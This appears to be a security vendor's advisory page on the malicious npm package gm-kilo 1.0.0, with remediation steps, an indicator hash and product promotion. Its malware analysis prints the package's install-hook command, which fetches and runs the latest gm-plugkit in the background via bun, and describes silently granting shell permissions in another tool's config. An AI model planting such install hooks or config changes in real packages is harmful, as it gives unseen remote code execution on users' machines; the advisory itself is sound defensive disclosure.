Which versions of gm-kilo are malicious?

The following npm versions of gm-kilo are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate gm-kilo if I installed it?

Remove gm-kilo from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

I already installed gm-kilo — how do I know if it already compromised me?

If gm-kilo was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is gm-kilo part of a known attack campaign?

Yes — gm-kilo is associated with the IN-MAL-2026-003513 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find gm-kilo across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for gm-kilo (version 1.0.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging gm-kilo across your stack and pipelines.

Malicious package

gm-kilonpm

Malicious code in gm-kilo (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4574

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall gm-kilo

What this malware does

package.json declares an install lifecycle script that runs bin/gm-kilo.js install. At install time, the script executes bun x gm-plugkit@latest spool > /dev/null 2>&1 & via execSync, which downloads and runs whatever the latest published version of gm-plugkit is using the Bun alternate runtime. The version pin is mutable (@latest), the command output is redirected to /dev/null, and the process is detached into the background — these properties are characteristic of covert remote-code execution at install time. Whoever controls publishing of gm-plugkit can deliver arbitrary code to every machine that installs gm-kilo, and the install hook hides that execution from the installer's terminal. Additionally, the install script writes to ~/.kilo/config.yml (a separate tool's configuration file) to register a gm agent with Bash(*plugkit*) shell-execute permission, silently expanding that tool's trust surface to invoke plugkit-related commands without user consent.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

b4a35ea8669a2b02f60117ecc483176741399084b0fbebf11900d0a89505d9fb

Detection & response playbook

Malicious package

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for gm-kilo (version 1.0.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging gm-kilo across your stack and pipelines.
If you installed it — respond
Remove gm-kilo from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.
Did it already run?
If gm-kilo was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks gm-kilo before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. gm-kilo on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-003513

References

npmjs.com

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks gm-kilo-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring